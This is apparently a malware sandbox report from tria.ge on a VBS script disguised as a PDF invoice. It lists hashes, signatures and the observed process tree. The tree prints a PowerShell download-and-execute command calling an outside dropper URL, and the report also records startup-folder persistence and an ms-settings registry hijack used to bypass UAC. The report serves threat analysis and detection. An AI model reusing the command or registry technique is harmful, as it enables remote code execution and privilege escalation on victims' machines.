Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
24s -
max time network
26s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
24/11/2023, 00:08
Static task
static1
Behavioral task
behavioral1
Sample
FACTURAgzneih0__Ikb_(295).PDF.vbs
Resource
win7-20231025-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
FACTURAgzneih0__Ikb_(295).PDF.vbs
Resource
win10v2004-20231020-en
10 signatures
150 seconds
Errors
Reason
Machine shutdown
General
-
Target
FACTURAgzneih0__Ikb_(295).PDF.vbs
-
Size
781B
-
MD5
498f2220d6962b5b49fc6c2750610a90
-
SHA1
06485ce9a6ba48a240c712497900a4240385ea02
-
SHA256
36c56e3a9202c35e76a3ed10d00650c821b6ee9e1b3834fbab5fa5047d1ee99c
-
SHA512
e7bd5952c327938e373811d3979c3a930d20782a9d8fc06f5f315da87f43ca02e3db86f65aaafebf63c86800df5733005f67db5a6dbf4546fd17ce4ed9649e42
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://dftssa.3utilities.com/03/17
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 4 2956 WScript.exe 6 2184 powershell.exe 8 2184 powershell.exe 9 2184 powershell.exe 10 2956 WScript.exe -
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zqkxwh9_.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zqkxwh9_EX.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zqkxwh9_AT.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zqkxwh9_AA.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_zqkxwh9_y.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\ms-settings\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\ms-settings\Shell\Open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\ms-settings\Shell\Open\command\ = "C:\\_zqkxwh9_\\_zqkxwh9_i7.exe" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\ms-settings\Shell\Open\command powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2184 powershell.exe Token: SeShutdownPrivilege 2516 shutdown.exe Token: SeRemoteShutdownPrivilege 2516 shutdown.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2956 wrote to memory of 2184 2956 WScript.exe 28 PID 2956 wrote to memory of 2184 2956 WScript.exe 28 PID 2956 wrote to memory of 2184 2956 WScript.exe 28 PID 2184 wrote to memory of 2516 2184 powershell.exe 31 PID 2184 wrote to memory of 2516 2184 powershell.exe 31 PID 2184 wrote to memory of 2516 2184 powershell.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACTURAgzneih0__Ikb_(295).PDF.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://dftssa.3utilities.com/03/17')"2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\shutdown.exe"C:\Windows\system32\shutdown.exe" /r /t 153⤵
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2520
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1772